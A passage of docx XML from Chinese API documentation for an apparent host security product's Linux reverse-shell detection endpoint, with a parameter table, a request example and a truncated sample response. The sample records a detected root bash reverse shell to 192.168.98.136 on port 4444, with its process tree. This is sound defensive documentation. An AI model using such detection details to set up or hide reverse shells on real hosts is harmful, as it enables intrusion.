            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2048BE7F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0FB6CBD5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C2F25ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>createTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37CEF0CE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>DateRange</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18F8E47B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F620DC4" w14:textId="56C98726" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>发现时间，格式参考</w:t>
            </w:r>
            <w:hyperlink w:anchor="通用get请求参数类型及说明">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>通用Get请求参数类型及说明</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="44813CCC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72B6639F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>processName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A18C245" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02E1C67C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A88285D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2F9BA46C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D0633C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61FC3E31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24EAB7CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B999FFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7DB3FFEA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00FF9237" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>targetIpLike</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6798E653" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FC8EDA5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A51C30A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>目标主机(模糊查询)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6E0C3FD1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D6DB76E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>targetPort</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7522E7E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57267263" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78FF1D19" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="09DEB2EB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66F918F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D3F355C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CEEF9C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76F0AB0B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F82A6D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1246FB78" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bounceshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux?page</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0&amp;size=50&amp;groups=1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4829E603" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A69DC82" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "dbcf7ac1b5537764",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.12.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.138",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.12.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "安装了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DNSmasq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签b"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oldtcm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>createTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1525935820,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 21794,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>processName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targetIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.98.136",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targetPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 4444,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>userName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>currentPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>groupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentPid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 44382,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/bin/bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stdInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stdin,stderr,stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>processTree</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>userName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ppid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    "name": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>groupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fileMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "100755",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>euidUserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>userName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ppid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1097,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sshd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sshd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>groupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fileMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "100755",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>euidUserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sshd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -D "</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>userName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ppid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1097,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 44340,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sshd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    "name": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sshd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>groupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
